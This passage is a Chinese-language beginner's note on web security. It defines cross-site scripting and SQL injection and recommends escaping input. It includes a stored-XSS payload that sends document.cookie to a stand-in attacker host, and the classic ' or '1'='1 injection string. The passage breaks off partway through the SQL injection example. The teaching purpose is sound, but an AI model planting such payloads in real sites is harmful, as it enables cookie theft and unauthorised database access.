概念
- 全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序。
案列
- 比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样的
<script>window.open(“www.gongji.com?param=”+document.cookie)</script>
,如果我没有对他的内容进行处理,直接存储到数据库,那么下一次当其他用户访问他的这篇文章的时候,服务器从数据库读取后然后响应给客户端,浏览器执行了这段脚本,然后就把该用户的cookie发送到攻击者的服务器了。
被攻击的原因
- 用户输入的数据变成了代码,比如说上面的
<script>
,应该只是字符串却有了代码的作用。
预防
- 将输入的数据进行转义处理,比如说讲 < 转义成<;
SQL注入
概念
- 通过sql命令伪装成正常的http请求参数,传递到服务器端,服务器执行sql命令造成对数据库进行攻击
案例
' or '1'= '1
。这是最常见的sql注入攻击,当我们输如用户名 j